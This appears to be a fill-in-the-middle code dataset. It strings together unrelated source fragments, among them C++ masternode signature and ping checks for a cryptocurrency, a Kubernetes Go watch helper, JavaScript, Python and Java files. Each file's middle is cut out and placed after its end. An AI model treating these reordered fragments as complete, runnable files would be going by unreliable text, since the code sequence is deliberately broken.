int mainnetDefaultPort = Params(CBaseChainParams::MAIN).GetDefaultPort();
if(Params().NetworkIDString() == CBaseChainParams::MAIN) {
if(service.GetPort() != mainnetDefaultPort) {
strErrorRet = strprintf("Invalid port %u for masternode %s, only %d is supported on mainnet.", service.GetPort(), strService, mainnetDefaultPort);
LogPrintf("CMasternodeBroadcast::Create -- %s\n", strErrorRet);
return false;
}
} else if (service.GetPort() == mainnetDefaultPort) {
strErrorRet = strprintf("Invalid port %u for masternode %s, %d is the only supported on mainnet.", service.GetPort(), strService, mainnetDefaultPort);
LogPrintf("CMasternodeBroadcast::Create -- %s\n", strErrorRet);
return false;
}
return Create(txin, CService(strService), keyCollateralAddressNew, pubKeyCollateralAddressNew, keyMasternodeNew, pubKeyMasternodeNew, strErrorRet, mnbRet);
}
bool CMasternodeBroadcast::Create(CTxIn txin, CService service, CKey keyCollateralAddressNew, CPubKey pubKeyCollateralAddressNew, CKey keyMasternodeNew, CPubKey pubKeyMasternodeNew, std::string &strErrorRet, CMasternodeBroadcast &mnbRet)
{
// wait for reindex and/or import to finish
if (fImporting || fReindex) return false;
LogPrint("masternode", "CMasternodeBroadcast::Create -- pubKeyCollateralAddressNew = %s, pubKeyMasternodeNew.GetID() = %s\n",
CBitcoinAddress(pubKeyCollateralAddressNew.GetID()).ToString(),
pubKeyMasternodeNew.GetID().ToString());
CMasternodePing mnp(txin);
if(!mnp.Sign(keyMasternodeNew, pubKeyMasternodeNew)) {
strErrorRet = strprintf("Failed to sign ping, masternode=%s", txin.prevout.ToStringShort());
LogPrintf("CMasternodeBroadcast::Create -- %s\n", strErrorRet);
mnbRet = CMasternodeBroadcast();
return false;
}
mnbRet = CMasternodeBroadcast(service, txin, pubKeyCollateralAddressNew, pubKeyMasternodeNew, PROTOCOL_VERSION);
if(!mnbRet.IsValidNetAddr()) {
strErrorRet = strprintf("Invalid IP address, masternode=%s", txin.prevout.ToStringShort());
LogPrintf("CMasternodeBroadcast::Create -- %s\n", strErrorRet);
mnbRet = CMasternodeBroadcast();
return false;
}
mnbRet.lastPing = mnp;
if(!mnbRet.Sign(keyCollateralAddressNew)) {
strErrorRet = strprintf("Failed to sign broadcast, masternode=%s", txin.prevout.ToStringShort());
LogPrintf("CMasternodeBroadcast::Create -- %s\n", strErrorRet);
mnbRet = CMasternodeBroadcast();
return false;
}
return true;
}
bool CMasternodeBroadcast::SimpleCheck(int& nDos)
{
nDos = 0;
// make sure addr is valid
if(!IsValidNetAddr()) {
LogPrintf("CMasternodeBroadcast::SimpleCheck -- Invalid addr, rejected: masternode=%s addr=%s\n",
vin.prevout.ToStringShort(), addr.ToString());
return false;
}
// make sure signature isn't in the future (past is OK)
if (sigTime > GetAdjustedTime() + 60 * 60) {
LogPrintf("CMasternodeBroadcast::SimpleCheck -- Signature rejected, too far into the future: masternode=%s\n", vin.prevout.ToStringShort());
nDos = 1;
return false;
}
// empty ping or incorrect sigTime/unknown blockhash
if(lastPing == CMasternodePing() || !lastPing.SimpleCheck(nDos)) {
// one of us is probably forked or smth, just mark it as expired and check the rest of the rules
nActiveState = MASTERNODE_EXPIRED;
}
if(nProtocolVersion < mnpayments.GetMinMasternodePaymentsProto()) {
LogPrintf("CMasternodeBroadcast::SimpleCheck -- ignoring outdated Masternode: masternode=%s nProtocolVersion=%d\n", vin.prevout.ToStringShort(), nProtocolVersion);
return false;
}
CScript pubkeyScript;
pubkeyScript = GetScriptForDestination(pubKeyCollateralAddress.GetID());
if(pubkeyScript.size() != 25) {
LogPrintf("CMasternodeBroadcast::SimpleCheck -- pubKeyCollateralAddress has the wrong size\n");
nDos = 100;
return false;
}
CScript pubkeyScript2;
pubkeyScript2 = GetScriptForDestination(pubKeyMasternode.GetID());
if(pubkeyScript2.size() != 25) {
LogPrintf("CMasternodeBroadcast::SimpleCheck -- pubKeyMasternode has the wrong size\n");
nDos = 100;
return false;
}
if(!vin.scriptSig.empty()) {
LogPrintf("CMasternodeBroadcast::SimpleCheck -- Ignore Not Empty ScriptSig %s\n",vin.ToString());
nDos = 100;
return false;
}
int mainnetDefaultPort = Params(CBaseChainParams::MAIN).GetDefaultPort();
if(Params().NetworkIDString() == CBaseChainParams::MAIN) {
if(addr.GetPort() != mainnetDefaultPort) return false;
} else if(addr.GetPort() == mainnetDefaultPort) return false;
return true;
}
bool CMasternodeBroadcast::Update(CMasternode* pmn, int& nDos)
{
nDos = 0;
if(pmn->sigTime == sigTime && !fRecovery) {
// mapSeenMasternodeBroadcast in CMasternodeMan::CheckMnbAndUpdateMasternodeList should filter legit duplicates
// but this still can happen if we just started, which is ok, just do nothing here.
return false;
}
// this broadcast is older than the one that we already have - it's bad and should never happen
// unless someone is doing something fishy
if(pmn->sigTime > sigTime) {
LogPrintf("CMasternodeBroadcast::Update -- Bad sigTime %d (existing broadcast is at %d) for Masternode %s %s\n",
sigTime, pmn->sigTime, vin.prevout.ToStringShort(), addr.ToString());
return false;
}
pmn->Check();
// masternode is banned by PoSe
if(pmn->IsPoSeBanned()) {
LogPrintf("CMasternodeBroadcast::Update -- Banned by PoSe, masternode=%s\n", vin.prevout.ToStringShort());
return false;
}
// IsVnAssociatedWithPubkey is validated once in CheckOutpoint, after that they just need to match
if(pmn->pubKeyCollateralAddress != pubKeyCollateralAddress) {
LogPrintf("CMasternodeBroadcast::Update -- Got mismatched pubKeyCollateralAddress and vin\n");
nDos = 33;
return false;
}
if (!CheckSignature(nDos)) {
LogPrintf("CMasternodeBroadcast::Update -- CheckSignature() failed, masternode=%s\n", vin.prevout.ToStringShort());
return false;
}
// if ther was no masternode broadcast recently or if it matches our Masternode privkey...
if(!pmn->IsBroadcastedWithin(MASTERNODE_MIN_MNB_SECONDS) || (fMasterNode && pubKeyMasternode == activeMasternode.pubKeyMasternode)) {
// take the newest entry
LogPrintf("CMasternodeBroadcast::Update -- Got UPDATED Masternode entry: addr=%s\n", addr.ToString());
if(pmn->UpdateFromNewBroadcast((*this))) {
pmn->Check();
Relay();
}
masternodeSync.AddedMasternodeList();
}
return true;
}
bool CMasternodeBroadcast::CheckOutpoint(int& nDos)
{
// we are a masternode with the same vin (i.e. already activated) and this mnb is ours (matches our Masternode privkey)
// so nothing to do here for us
if(fMasterNode && vin.prevout == activeMasternode.vin.prevout && pubKeyMasternode == activeMasternode.pubKeyMasternode) {
return false;
}
if (!CheckSignature(nDos)) {
LogPrintf("CMasternodeBroadcast::CheckOutpoint -- CheckSignature() failed, masternode=%s\n", vin.prevout.ToStringShort());
return false;
}
{
TRY_LOCK(cs_main, lockMain);
if(!lockMain) {
// not mnb fault, let it to be checked again later
LogPrint("masternode", "CMasternodeBroadcast::CheckOutpoint -- Failed to aquire lock, addr=%s", addr.ToString());
mnodeman.mapSeenMasternodeBroadcast.erase(GetHash());
return false;
}
CCoins coins;
if(!pcoinsTip->GetCoins(vin.prevout.hash, coins) ||
(unsigned int)vin.prevout.n>=coins.vout.size() ||
coins.vout[vin.prevout.n].IsNull()) {
LogPrint("masternode", "CMasternodeBroadcast::CheckOutpoint -- Failed to find Masternode UTXO, masternode=%s\n", vin.prevout.ToStringShort());
return false;
}
if(coins.vout[vin.prevout.n].nValue != 1000 * COIN) {
LogPrint("masternode", "CMasternodeBroadcast::CheckOutpoint -- Masternode UTXO should have 1000 INNOVA, masternode=%s\n", vin.prevout.ToStringShort());
return false;
}
if(chainActive.Height() - coins.nHeight + 1 < Params().GetConsensus().nMasternodeMinimumConfirmations) {
LogPrintf("CMasternodeBroadcast::CheckOutpoint -- Masternode UTXO must have at least %d confirmations, masternode=%s\n",
Params().GetConsensus().nMasternodeMinimumConfirmations, vin.prevout.ToStringShort());
// maybe we miss few blocks, let this mnb to be checked again later
mnodeman.mapSeenMasternodeBroadcast.erase(GetHash());
return false;
}
}
LogPrint("masternode", "CMasternodeBroadcast::CheckOutpoint -- Masternode UTXO verified\n");
// make sure the vout that was signed is related to the transaction that spawned the Masternode
// - this is expensive, so it's only done once per Masternode
if(!darkSendSigner.IsVinAssociatedWithPubkey(vin, pubKeyCollateralAddress)) {
LogPrintf("CMasternodeMan::CheckOutpoint -- Got mismatched pubKeyCollateralAddress and vin\n");
nDos = 33;
return false;
}
// verify that sig time is legit in past
// should be at least not earlier than block when 1000 INNOVA tx got nMasternodeMinimumConfirmations
uint256 hashBlock = uint256();
CTransaction tx2;
GetTransaction(vin.prevout.hash, tx2, Params().GetConsensus(), hashBlock, true);
{
LOCK(cs_main);
BlockMap::iterator mi = mapBlockIndex.find(hashBlock);
if (mi != mapBlockIndex.end() && (*mi).second) {
CBlockIndex* pMNIndex = (*mi).second; // block for 1000 INNOVA tx -> 1 confirmation
CBlockIndex* pConfIndex = chainActive[pMNIndex->nHeight + Params().GetConsensus().nMasternodeMinimumConfirmations - 1]; // block where tx got nMasternodeMinimumConfirmations
if(pConfIndex->GetBlockTime() > sigTime) {
LogPrintf("CMasternodeBroadcast::CheckOutpoint -- Bad sigTime %d (%d conf block is at %d) for Masternode %s %s\n",
sigTime, Params().GetConsensus().nMasternodeMinimumConfirmations, pConfIndex->GetBlockTime(), vin.prevout.ToStringShort(), addr.ToString());
return false;
}
}
}
return true;
}
bool CMasternodeBroadcast::Sign(CKey& keyCollateralAddress)
{
std::string strError;
std::string strMessage;
sigTime = GetAdjustedTime();
strMessage = addr.ToString(false) + boost::lexical_cast<std::string>(sigTime) +
pubKeyCollateralAddress.GetID().ToString() + pubKeyMasternode.GetID().ToString() +
boost::lexical_cast<std::string>(nProtocolVersion);
if(!darkSendSigner.SignMessage(strMessage, vchSig, keyCollateralAddress)) {
LogPrintf("CMasternodeBroadcast::Sign -- SignMessage() failed\n");
return false;
}
if(!darkSendSigner.VerifyMessage(pubKeyCollateralAddress, vchSig, strMessage, strError)) {
LogPrintf("CMasternodeBroadcast::Sign -- VerifyMessage() failed, error: %s\n", strError);
return false;
}
return true;
}
bool CMasternodeBroadcast::CheckSignature(int& nDos)
{
std::string strMessage;
std::string strError = "";
nDos = 0;
strMessage = addr.ToString(false) + boost::lexical_cast<std::string>(sigTime) +
pubKeyCollateralAddress.GetID().ToString() + pubKeyMasternode.GetID().ToString() +
boost::lexical_cast<std::string>(nProtocolVersion);
LogPrint("masternode", "CMasternodeBroadcast::CheckSignature -- strMessage: %s pubKeyCollateralAddress address: %s sig: %s\n", strMessage, CBitcoinAddress(pubKeyCollateralAddress.GetID()).ToString(), EncodeBase64(&vchSig[0], vchSig.size()));
if(!darkSendSigner.VerifyMessage(pubKeyCollateralAddress, vchSig, strMessage, strError)){
LogPrintf("CMasternodeBroadcast::CheckSignature -- Got bad Masternode announce signature, error: %s\n", strError);
nDos = 100;
return false;
}
return true;
}
void CMasternodeBroadcast::Relay()
{
CInv inv(MSG_MASTERNODE_ANNOUNCE, GetHash());
RelayInv(inv);
}
CMasternodePing::CMasternodePing(CTxIn& vinNew)
{
LOCK(cs_main);
if (!chainActive.Tip() || chainActive.Height() < 12) return;
vin = vinNew;
blockHash = chainActive[chainActive.Height() - 12]->GetBlockHash();
sigTime = GetAdjustedTime();
vchSig = std::vector<unsigned char>();
}
bool CMasternodePing::Sign(CKey& keyMasternode, CPubKey& pubKeyMasternode)
{
std::string strError;
std::string strMasterNodeSignMessage;
sigTime = GetAdjustedTime();
std::string strMessage = vin.ToString() + blockHash.ToString() + boost::lexical_cast<std::string>(sigTime);
if(!darkSendSigner.SignMessage(strMessage, vchSig, keyMasternode)) {
LogPrintf("CMasternodePing::Sign -- SignMessage() failed\n");
return false;
}
if(!darkSendSigner.VerifyMessage(pubKeyMasternode, vchSig, strMessage, strError)) {
LogPrintf("CMasternodePing::Sign -- VerifyMessage() failed, error: %s\n", strError);
return false;
}
return true;
}
bool CMasternodePing::CheckSignature(CPubKey& pubKeyMasternode, int &nDos)
{
std::string strMessage = vin.ToString() + blockHash.ToString() + boost::lexical_cast<std::string>(sigTime);
std::string strError = "";
nDos = 0;
if(!darkSendSigner.VerifyMessage(pubKeyMasternode, vchSig, strMessage, strError)) {
LogPrintf("CMasternodePing::CheckSignature -- Got bad Masternode ping signature, masternode=%s, error: %s\n", vin.prevout.ToStringShort(), strError);
nDos = 33;
return false;
}
return true;
}
bool CMasternodePing::SimpleCheck(int& nDos)
{
// don't ban by default
nDos = 0;
if (sigTime > GetAdjustedTime() + 60 * 60) {
LogPrintf("CMasternodePing::SimpleCheck -- Signature rejected, too far into the future, masternode=%s\n", vin.prevout.ToStringShort());
nDos = 1;
return false;
}
{
LOCK(cs_main);
BlockMap::iterator mi = mapBlockIndex.find(blockHash);
if (mi == mapBlockIndex.end()) {
LogPrint("masternode", "CMasternodePing::SimpleCheck -- Masternode ping is invalid, unknown block hash: masternode=%s blockHash=%s\n", vin.prevout.ToStringShort(), blockHash.ToString());
// maybe we stuck or forked so we shouldn't ban this node, just fail to accept this ping
// TODO: or should we also request this block?
return false;
}
}
LogPrint("masternode", "CMasternodePing::SimpleCheck -- Masternode ping verified: masternode=%s blockHash=%s sigTime=%d\n", vin.prevout.ToStringShort(), blockHash.ToString(), sigTime);
return true;
}
bool CMasternodePing::CheckAndUpdate(CMasternode* pmn, bool fFromNewBroadcast, int& nDos)
{
// don't ban by default
nDos = 0;
if (!SimpleCheck(nDos)) {
return false;
}
if (pmn == NULL) {
LogPrint("masternode", "CMasternodePing::CheckAndUpdate -- Couldn't find Masternode entry, masternode=%s\n", vin.prevout.ToStringShort());
return false;
}
if(!fFromNewBroadcast) {
if (pmn->IsUpdateRequired()) {
LogPrint("masternode", "CMasternodePing::CheckAndUpdate -- masternode protocol is outdated, masternode=%s\n", vin.prevout.ToStringShort());
return false;
}
if (pmn->IsNewStartRequired()) {
LogPrint("masternode", "CMasternodePing::CheckAndUpdate -- masternode is completely expired, new start is required, masternode=%s\n", vin.prevout.ToStringShort());
return false;
}
}
{
LOCK(cs_main);
BlockMap::iterator mi = mapBlockIndex.find(blockHash);
if ((*mi).second && (*mi).second->nHeight < chainActive.Height() - 24) {
LogPrintf("CMasternodePing::CheckAndUpdate -- Masternode ping is invalid, block hash is too old: masternode=%s blockHash=%s\n", vin.prevout.ToStringShort(), blockHash.ToString());
// nDos = 1;
return false;
}
}
LogPrint("masternode", "CMasternodePing::CheckAndUpdate -- New ping: masternode=%s blockHash=%s sigTime=%d\n", vin.prevout.ToStringShort(), blockHash.ToString(), sigTime);
// LogPrintf("mnping - Found corresponding mn for vin: %s\n", vin.prevout.ToStringShort());
// update only if there is no known ping for this masternode or
// last ping was more then MASTERNODE_MIN_MNP_SECONDS-60 ago comparing to this one
if (pmn->IsPingedWithin(MASTERNODE_MIN_MNP_SECONDS - 60, sigTime)) {
LogPrint("masternode", "CMasternodePing::CheckAndUpdate -- Masternode ping arrived too early, masternode=%s\n", vin.prevout.ToStringShort());
//nDos = 1; //disable, this is happening frequently and causing banned peers
return false;
}
if (!CheckSignature(pmn->pubKeyMasternode, nDos)) return false;
// so, ping seems to be ok
// if we are still syncing and there was no known ping for this mn for quite a while
// (NOTE: assuming that MASTERNODE_EXPIRATION_SECONDS/2 should be enough to finish mn list sync)
if(!masternodeSync.IsMasternodeListSynced() && !pmn->IsPingedWithin(MASTERNODE_EXPIRATION_SECONDS/2)) {
// let's bump sync timeout
LogPrint("masternode", "CMasternodePing::CheckAndUpdate -- bumping sync timeout, masternode=%s\n", vin.prevout.ToStringShort());
masternodeSync.AddedMasternodeList();
}
// let's store this ping as the last one
LogPrint("masternode", "CMasternodePing::CheckAndUpdate -- Masternode ping accepted, masternode=%s\n", vin.prevout.ToStringShort());
pmn->lastPing = *this;
// and update mnodeman.mapSeenMasternodeBroadcast.lastPing which is probably outdated
CMasternodeBroadcast mnb(*pmn);
uint256 hash = mnb.GetHash();
if (mnodeman.mapSeenMasternodeBroadcast.count(hash)) {
mnodeman.mapSeenMasternodeBroadcast[hash].second.lastPing = *this;
}
pmn->Check(true); // force update, ignoring cache
if (!pmn->IsEnabled()) return false;
LogPrint("masternode", "CMasternodePing::CheckAndUpdate -- Masternode ping acceepted and relayed, masternode=%s\n", vin.prevout.ToStringShort());
Relay();
return true;
}
void CMasternodePing::Relay()
{
CInv inv(MSG_MASTERNODE_PING, GetHash());
RelayInv(inv);
}
void CMasternode::AddGovernanceVote(uint256 nGovernanceObjectHash)
{
if(mapGovernanceObjectsVotedOn.count(nGovernanceObjectHash)) {
mapGovernanceObjectsVotedOn[nGovernanceObjectHash]++;
} else {
mapGovernanceObjectsVotedOn.insert(std::make_pair(nGovernanceObjectHash, 1));
}
}
void CMasternode::RemoveGovernanceObject(uint256 nGovernanceObjectHash)
{
std::map<uint256, int>::iterator it = mapGovernanceObjectsVotedOn.find(nGovernanceObjectHash);
if(it == mapGovernanceObjectsVotedOn.end()) {
return;
}
mapGovernanceObjectsVotedOn.erase(it);
}
void CMasternode::UpdateWatchdogVoteTime()
{
LOCK(cs);
nTimeLastWatchdogVote = GetTime();
}
/**
* FLAG GOVERNANCE ITEMS AS DIRTY
*
* - When masternode come and go on the network, we must flag the items they voted on to recalc it's cached flags
*
*/
void CMasternode::FlagGovernanceItemsAsDirty()
{
std::vector<uint256> vecDirty;
{
std::map<uint256, int>::iterator it = mapGovernanceObjectsVotedOn.begin();
while(it != mapGovernanceObjectsVotedOn.end()) {
vecDirty.push_back(it->first);
++it;
}
}
for(size_t i = 0; i < vecDirty.size(); ++i) {
mnodeman.AddDirtyGovernanceObjectHash(vecDirty[i]);
}
}<|fim▁end|> | |
<|file_name|>until.go<|end_file_name|><|fim▁begin|>/*
Copyright 2016 The Kubernetes Authors.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
*/
package watch
import (
"time"
"k8s.io/kubernetes/pkg/api"
"k8s.io/kubernetes/pkg/api/meta"
"k8s.io/kubernetes/pkg/runtime"
"k8s.io/kubernetes/pkg/util/wait"
)
// ConditionFunc returns true if the condition has been reached, false if it has not been reached yet,
// or an error if the condition cannot be checked and should terminate. In general, it is better to define
// level driven conditions over edge driven conditions (pod has ready=true, vs pod modified and ready changed
// from false to true).
type ConditionFunc func(event Event) (bool, error)
// Until reads items from the watch until each provided condition succeeds, and then returns the last watch
// encountered. The first condition that returns an error terminates the watch (and the event is also returned).
// If no event has been received, the returned event will be nil.
// Conditions are satisfied sequentially so as to provide a useful primitive for higher level composition.
// A zero timeout means to wait forever.
func Until(timeout time.Duration, watcher Interface, conditions ...ConditionFunc) (*Event, error) {
ch := watcher.ResultChan()
defer watcher.Stop()
var after <-chan time.Time
if timeout > 0 {
after = time.After(timeout)
} else {
ch := make(chan time.Time)
defer close(ch)
after = ch
}
var lastEvent *Event
for _, condition := range conditions {
// check the next condition against the previous event and short circuit waiting for the next watch
if lastEvent != nil {
done, err := condition(*lastEvent)
if err != nil {
return lastEvent, err
}
if done {
continue
}
}
ConditionSucceeded:
for {
select {
case event, ok := <-ch:
if !ok {
return lastEvent, wait.ErrWaitTimeout
}
lastEvent = &event
// TODO: check for watch expired error and retry watch from latest point?
done, err := condition(event)
if err != nil {
return lastEvent, err
}
if done {
break ConditionSucceeded
}
case <-after:
return lastEvent, wait.ErrWaitTimeout
}
}
}
return lastEvent, nil
}
// ListerWatcher is any object that knows how to perform an initial list and start a watch on a resource.
type ListerWatcher interface {
// List should return a list type object; the Items field will be extracted, and the
// ResourceVersion field will be used to start the watch in the right place.
List(options api.ListOptions) (runtime.Object, error)
// Watch should begin a watch at the specified version.
Watch(options api.ListOptions) (Interface, error)
}
// TODO: check for watch expired error and retry watch from latest point? Same issue exists for Until.
func ListWatchUntil(timeout time.Duration, lw ListerWatcher, conditions ...ConditionFunc) (*Event, error) {
if len(conditions) == 0 {
return nil, nil
}
list, err := lw.List(api.ListOptions{})
if err != nil {
return nil, err
}
initialItems, err := meta.ExtractList(list)
if err != nil {
return nil, err
}
// use the initial items as simulated "adds"
var lastEvent *Event
currIndex := 0
passedConditions := 0<|fim▁hole|> done, err := condition(*lastEvent)
if err != nil {
return lastEvent, err
}
if done {
passedConditions = passedConditions + 1
continue
}
}
ConditionSucceeded:
for currIndex < len(initialItems) {
lastEvent = &Event{Type: Added, Object: initialItems[currIndex]}
currIndex++
done, err := condition(*lastEvent)
if err != nil {
return lastEvent, err
}
if done {
passedConditions = passedConditions + 1
break ConditionSucceeded
}
}
}
if passedConditions == len(conditions) {
return lastEvent, nil
}
remainingConditions := conditions[passedConditions:]
metaObj, err := meta.ListAccessor(list)
if err != nil {
return nil, err
}
currResourceVersion := metaObj.GetResourceVersion()
watch, err := lw.Watch(api.ListOptions{ResourceVersion: currResourceVersion})
if err != nil {
return nil, err
}
return Until(timeout, watch, remainingConditions...)
}<|fim▁end|> | for _, condition := range conditions {
// check the next condition against the previous event and short circuit waiting for the next watch
if lastEvent != nil { |
<|file_name|>app.tests.ts<|end_file_name|><|fim▁begin|>import * as submodule from '../src/app';<|fim▁hole|>describe("app", () => {
it("thisShouldNotError returns something", () => {
expect(submodule.thisShouldNotError()).not.toBe(undefined as any);
});
});<|fim▁end|> | |
<|file_name|>dashboard.js<|end_file_name|><|fim▁begin|>'use strict';
var Ose = require('ose');
var M = Ose.class(module, './index');
/** Docs {{{1
* @submodule bb.pagelet
*/
/**
* @caption Dashboard pagelet
*<|fim▁hole|> * Pagelet for creating dashboard content.
*
* @class bb.lib.pagelet.dashboard
* @type class
* @extends bb.lib.pagelet
*/
// Public {{{1
exports.loadData = function(cb) { // {{{2
/**
* Has a new list widget created and appends it to the main pagelet
* element. It also calls the "Ose.ui.dashboard()"
* method. "Ose.ui.dashboard()" governs what is diaplayed on the
* dashboard.
*
* @method loadData
*/
if (cb) {
this.doAfterDisplay = cb;
}
this.$('header').html('Dashboard');
this.$()
.empty()
.append(this.newWidget('list', 'list'))
;
if (Ose.ui.configData.dashboard) {
this.addContents(Ose.ui.configData.dashboard);
}
if (Ose.ui.dashboard) {
Ose.ui.dashboard(this, this.afterDisplay.bind(this));
} else {
this.afterDisplay();
}
};
exports.addContent = function(caption, stateObj) { // {{{2
/**
* Adds an item to the dashboard.
*
* @param caption {String} Text to be displayed
* @param stateObj {Object} State object that should be displayed when the user taps on this item.
*/
return this.addItem(caption, Ose.ui.bindContent(stateObj));
};
exports.addContents = function(data) { // {{{2
/**
* Adds items to the dashboard.
*
* @param data {Array} Array of items
*/
for (var i = 0; i < data.length; i++) {
var item = data[i];
this.addContent(item.caption, item.data);
}
};
exports.addItem = function(caption, onTap) { // {{{2
/**
* Adds an item to the dashboard.
*
* @param caption {String} Text to be displayed
* @param onTap {Function} Function to be called when the user taps on this item.
*/
return this.$('list > ul').append(
this.newWidget('listItem', null, {
tap: onTap,
caption: caption
})
);
};
exports.addPagelet = function(params, cb) { // {{{2
/**
* Adds an item to the dashboardk.
*
* @param caption {String} Text to be displayed
* @param cb {Function} Function to be called when the user taps on this item.
*/
var result = this.newPagelet(params);
$('<li>')
.append(result.html())
.appendTo(this.$('list > ul'))
;
result.loadData();
cb(); // TODO Send "cb" to loadData.
return result;
};
exports.verifyStateObj = function(data) { // {{{2
/**
* Verifies that data correspond to the displayed pagelet.
*
* @param data {Object} State object to be compared
*
* @returns {Boolean} Whether data correspond to the displayed pagelet
* @method verifyStateObj
*/
return data.pagelet === 'dashboard';
};
// }}}1<|fim▁end|> | * @readme |
<|file_name|>Gruntfile.js<|end_file_name|><|fim▁begin|>var module = module;
//this keeps the module file from doing anything inside the jasmine tests.
//We could avoid this by making all the source be in a specific directory, but that would break backwards compatibility.
if (module) {
module.exports = function (grunt) {
'use strict';
var config, debug, environment, spec;
grunt.loadNpmTasks('grunt-contrib-jasmine');
grunt.registerTask('default', ['jasmine']);
spec = grunt.option('spec') || '*';
config = grunt.file.readJSON('config.json');
return grunt.initConfig({
pkg: grunt.file.readJSON('package.json'),
jasmine: {
dev: {
src: "./*.js",
options: {
vendor:["https://rally1.rallydev.com/apps/"+config.sdk+"/sdk-debug.js"],
template: 'test/specs.tmpl',
specs: "test/**/" + spec + "Spec.js",
helpers: []
}
}
},
rallydeploy: {
options: {
server: config.server,<|fim▁hole|> projectOid: 0,
deployFile: "deploy.json",
credentialsFile: "credentials.json",
timeboxFilter: "none"
},
prod: {
options: {
tab: "myhome",
pageName: config.name,
shared: false
}
}
}
});
};
}<|fim▁end|> | |
<|file_name|>specials.py<|end_file_name|><|fim▁begin|>from djpcms import sites
from djpcms.http import get_http
from djpcms.template import RequestContext, loader
from djpcms.views.baseview import djpcmsview
class badview(djpcmsview):
def __init__(self, template, httphandler):
self.template = template
self.httphandler = httphandler
super(badview,self).__init__()
def response(self, request):
t = loader.get_template(self.template)
c = {'request_path': request.path,
'grid': self.grid960()}
return self.httphandler(t.render(RequestContext(request, c)))<|fim▁hole|> http = get_http(sites.settings.HTTP_LIBRARY)
return badview('404.html',
http.HttpResponseNotFound).response(request)
def http500view(request, *args, **kwargs):
http = get_http(sites.settings.HTTP_LIBRARY)
return badview('500.html',
http.HttpResponseServerError).response(request)<|fim▁end|> |
def http404view(request, *args, **kwargs): |
<|file_name|>nTEC_Sres.java<|end_file_name|><|fim▁begin|>/**
*/
package sc.ndt.editor.fast.fastfst;
import org.eclipse.emf.ecore.EObject;
/**
* <!-- begin-user-doc -->
* A representation of the model object '<em><b>nTEC Sres</b></em>'.
* <!-- end-user-doc -->
*
* <p>
* The following features are supported:
* <ul>
* <li>{@link sc.ndt.editor.fast.fastfst.nTEC_Sres#getValue <em>Value</em>}</li>
* <li>{@link sc.ndt.editor.fast.fastfst.nTEC_Sres#getName <em>Name</em>}</li>
* </ul>
* </p>
*
* @see sc.ndt.editor.fast.fastfst.FastfstPackage#getnTEC_Sres()
* @model
* @generated
*/
public interface nTEC_Sres extends EObject
{
/**
* Returns the value of the '<em><b>Value</b></em>' attribute.
* <!-- begin-user-doc -->
* <p>
* If the meaning of the '<em>Value</em>' attribute isn't clear,
* there really should be more of a description here...
* </p>
* <!-- end-user-doc -->
* @return the value of the '<em>Value</em>' attribute.
* @see #setValue(float)
* @see sc.ndt.editor.fast.fastfst.FastfstPackage#getnTEC_Sres_Value()
* @model
* @generated
*/
float getValue();
/**
* Sets the value of the '{@link sc.ndt.editor.fast.fastfst.nTEC_Sres#getValue <em>Value</em>}' attribute.
* <!-- begin-user-doc -->
* <!-- end-user-doc -->
* @param value the new value of the '<em>Value</em>' attribute.
* @see #getValue()
* @generated
*/
void setValue(float value);<|fim▁hole|> /**
* Returns the value of the '<em><b>Name</b></em>' attribute.
* <!-- begin-user-doc -->
* <p>
* If the meaning of the '<em>Name</em>' attribute isn't clear,
* there really should be more of a description here...
* </p>
* <!-- end-user-doc -->
* @return the value of the '<em>Name</em>' attribute.
* @see #setName(String)
* @see sc.ndt.editor.fast.fastfst.FastfstPackage#getnTEC_Sres_Name()
* @model
* @generated
*/
String getName();
/**
* Sets the value of the '{@link sc.ndt.editor.fast.fastfst.nTEC_Sres#getName <em>Name</em>}' attribute.
* <!-- begin-user-doc -->
* <!-- end-user-doc -->
* @param value the new value of the '<em>Name</em>' attribute.
* @see #getName()
* @generated
*/
void setName(String value);
} // nTEC_Sres<|fim▁end|> | |
<|file_name|>__init__.py<|end_file_name|><|fim▁begin|>import os
import sys
import yaml
from etllib.conf import Conf
from etllib.yaml_helper import YAMLHelper
from plugins import PluginEngine
class RulesEngine(list):
def __init__(self):
self.rules_path = os.path.dirname(os.path.realpath(__file__))<|fim▁hole|> self.pe = PluginEngine()
def parse_rule_file(self, file_path):
yaml_data = YAMLHelper(file_path).read()
yaml_data['rule_name'] = os.path.split(file_path)[1]
if yaml_data['rule_type'] == 'group':
# Group Rule, i.e. with child rules
pass
else:
# Single Rule, i.e. with no child rules
# Get Data Nodes parameters from Config file
src = yaml_data['source_node']
dst = yaml_data['destination_node']
yaml_data['source_node'] = self.conf.get_data_nodes(src)
yaml_data['destination_node'] = self.conf.get_data_nodes(dst)
return yaml_data
def load(self):
rule_files = [os.path.join(self.rules_path, f)
for f in os.listdir(self.rules_path)
if os.path.isfile(os.path.join(self.rules_path, f))
and f.endswith('.yml')
]
for rule_file in rule_files:
self.append(self.parse_rule_file(rule_file))
def filter_recursion(self):
# Filter out group rules with members of type groups
for rule in self:
if rule['rule_type'] == 'group':
rule_members = [
child for child in rule['members']
if self.get_rule_by_name(child)['rule_type'] == 'single'
]
rule['members'] = rule_members
def get_rule_by_name(self, rule_name):
for rule in self:
if rule['rule_name'] == rule_name:
return rule
#print 'rule not found'
def expand_action(self, action):
if isinstance(action, str):
if action.startswith('$rule:'):
_, subrule_name, subrule_field = action.strip().split(':')
subrule = self.get_rule_by_name(subrule_name)
return self.apply_rule_ingress(subrule)[subrule_field]
else:
return action
elif isinstance(action, dict):
for key, val in action.iteritems():
action[key] = self.expand_action(val)
return action
else:
return action
def apply_rule_ingress(self, rule):
ingress_plugin_name = rule['ingress_plugin']
ingress_plugin_runnable = self.pe[ingress_plugin_name].init(rule)
data = ingress_plugin_runnable.run(rule, None)
ingress_plugin_runnable.exit()
return data
def apply_rule_egress(self, rule, data):
egress_plugin_name = rule['egress_plugin']
egress_plugin_runnable = self.pe[egress_plugin_name].init(rule)
egress_plugin_runnable.run(rule, data)
egress_plugin_runnable.exit()
def apply_data_processors(self, rule, data):
if not rule.get('data_processors', False):
return data
if type(rule['data_processors']) is str:
data_processors = [rule['data_processors']]
else:
data_processors = rule['data_processors']
for processor_plugin_name in data_processors:
processor_plugin_runnable = self.pe[processor_plugin_name].init(rule)
data = processor_plugin_runnable.run(rule, data)
processor_plugin_runnable.exit()
